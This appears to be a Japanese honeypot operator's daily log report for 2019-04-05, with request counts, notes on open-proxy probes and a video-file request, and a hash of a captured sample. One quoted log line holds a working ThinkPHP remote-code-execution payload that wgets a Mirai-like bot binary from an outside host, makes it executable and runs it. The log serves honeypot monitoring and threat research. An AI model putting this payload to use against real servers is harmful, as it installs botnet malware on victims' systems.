■2019-04-05のアクセス数は68件でした。
■送信元IPアドレスの数は 46件です。
■メソッドの種別は以下です。
GET・・64件 PUT・・0件 POST・・0件 HEAD・・1件 CONNECT・・3件 PROFFIND・・0件 その他・・0件
気になるlog
不正中継調査の通信
4日振りに観測。前回と同じhostでどのlogも9:30だった。調査するサービスでもあるのだろうか。
www.123cha.com、www.baidu.com、cn.bing.com、www.ip.cn、api.ipify.org
46件目。m3u8って動画ファイルだそう。動画泥棒の偵察とかかな?
[2019-04-05 10:27:34+0900] 122.228.19.80 ほげ:80 "GET /mahua/v/20190212/8dfcb2192a5052e5a152b9d8115201af_24f3fa0cbc00474fab1610181191b09c_0.m3u8 HTTP/1.1" 200 False GET /mahua/v/20190212/8dfcb2192a5052e5a152b9d8115201af_24f3fa0cbc00474fab1610181191b09c_0.m3u8 HTTP/1.1 Host: ほげ:80 ache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,fr;q=0.7 Cookie: __cfduid=df196e929b0113f0ecbe95f35e04588001551851468 Connection: close
59件目。ThinkPHP脆弱性からのダウンロード!
[2019-04-05 17:21:36+0900] 220.130.240.96 127.0.0.1:80 "GET /index.php? GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://love.thotiana.live/bins/x86.bot;cat%20x86.bot%20>%20fucklol;chmod%20777%20fucklol;./fucklol%20thinkphp HTTP/1.1 Host: 127.0.0.1 User-Agent: WOW Accept: */* Accept-Language: en-US,en;q=0.8 Connection: Keep-Alive
すっかり常連となった。ThinkPHP脆弱性への攻撃、miraiっぽいファイルをダウンロードさせている。
b2128d9757426f114b3ca718a6ad1c5850381077666ffb05703da95e20604b0b
virustotalはこちら
sandboxの結果はこちら